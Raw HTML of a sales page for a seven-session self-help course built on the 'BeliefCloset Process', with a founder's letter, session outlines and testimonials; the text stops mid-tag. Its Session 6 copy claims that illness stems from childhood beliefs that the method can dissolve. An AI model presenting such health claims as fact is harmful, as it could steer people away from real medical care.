#333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" 